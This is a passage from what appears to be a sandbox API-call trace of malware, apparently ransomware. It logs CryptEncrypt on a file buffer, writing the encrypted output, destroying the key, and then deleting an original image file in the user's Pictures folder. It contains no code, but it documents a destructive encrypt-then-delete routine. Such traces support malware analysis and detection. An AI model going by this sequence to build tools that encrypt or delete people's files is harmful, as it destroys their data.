returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0210.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab260, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.421] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x3cf9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x3d00) returned 1 [0210.422] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.422] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.422] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.422] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.422] CharLowerBuffW (in: lpsz="byte[15616]", cchLength=0xb | out: lpsz="byte[15616]") returned 0xb [0210.422] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.422] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.422] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.422] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.422] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.422] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.422] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab2f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.423] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2aae878*, pdwDataLen=0x8cef60*=0x3cf9, dwBufLen=0x3d00 | out: pbData=0x2aae878*, pdwDataLen=0x8cef60*=0x3d00) returned 1 [0210.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.424] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.424] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.424] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.424] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.424] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.424] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.424] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.424] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.424] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.424] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.424] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.424] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.424] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.424] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.424] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.424] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.424] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.424] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.424] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.424] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.426] WriteFile (in: hFile=0x4dc, lpBuffer=0x2a9a940*, nNumberOfBytesToWrite=0x3d00, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a9a940*, lpNumberOfBytesWritten=0x8cf5e4*=0x3d00, lpOverlapped=0x0) returned 1 [0210.427] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.427] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.428] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0210.428] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.428] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0210.428] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.428] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.428] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.428] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.428] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.428] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.428] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.428] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaae70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0210.428] CryptDestroyKey (hKey=0x9e1db8) returned 1 [0210.428] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.428] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.428] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.428] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.428] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.428] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.428] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.428] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.429] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.429] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.429] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.429] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.429] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.429] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.429] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.429] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.429] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.429] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.429] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.429] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.429] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.429] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.429] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.429] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.429] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.429] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.429] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.429] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.429] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.429] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.429] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.430] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.430] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.430] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.430] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.430] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.430] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.430] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.430] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.430] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.430] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.430] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.430] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.430] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.430] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.430] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.430] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.430] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.430] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.430] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.430] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.430] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.430] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0210.431] CryptReleaseContext (hProv=0xa7c2a8, dwFlags=0x0) returned 1 [0210.431] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.431] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.431] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.431] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.431] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.431] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.431] FreeLibrary (hLibModule=0x76390000) returned 1 [0210.431] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.431] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.431] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.431] CloseHandle (hObject=0x520) returned 1 [0210.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.471] CloseHandle (hObject=0x4dc) returned 1 [0210.473] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.473] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.473] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.473] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.473] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Hv6N_Hm7BbFlazd6N.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Hv6N_Hm7BbFlazd6N.gif", lpFilePart=0x8cedf4*="Hv6N_Hm7BbFlazd6N.gif") returned 0x2e [0210.474] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Hv6N_Hm7BbFlazd6N.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\hv6n_hm7bbflazd6n.gif")) returned 0x20 [0210.474] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Hv6N_Hm7BbFlazd6N.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e0fe100, ftCreationTime.dwHighDateTime=0x1d5d14f, ftLastAccessTime.dwLowDateTime=0x9926a460, ftLastAccessTime.dwHighDateTime=0x1d5cbc5, ftLastWriteTime.dwLowDateTime=0x9926a460, ftLastWriteTime.dwHighDateTime=0x1d5cbc5, nFileSizeHigh=0x0, nFileSizeLow=0x3cf9, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Hv6N_Hm7BbFlazd6N.gif", cAlternateFileName="HV6N_H~1.GIF")) returned 0x9e1cb8 [0210.474] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Hv6N_Hm7BbFlazd6N.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\hv6n_hm7bbflazd6n.gif")) returned 1 [0210.476] FindNextFileW (in: hFindFile=0x9e1cb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e0fe100, ftCreationTime.dwHighDateTime=0x1d5d14f, ftLastAccessTime.dwLowDateTime=0x9926a460, ftLastAccessTime.dwHighDateTime=0x1d5cbc5, ftLastWriteTime.dwLowDateTime=0x9926a460, ftLastWriteTime.dwHighDateTime=0x1d5cbc5, nFileSizeHigh=0x0, nFileSizeLow=0x3cf9, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Hv6N_Hm7BbFlazd6N.gif", cAlternateFileName="HV6N_H~1.GIF")) returned 0 [0210.476] 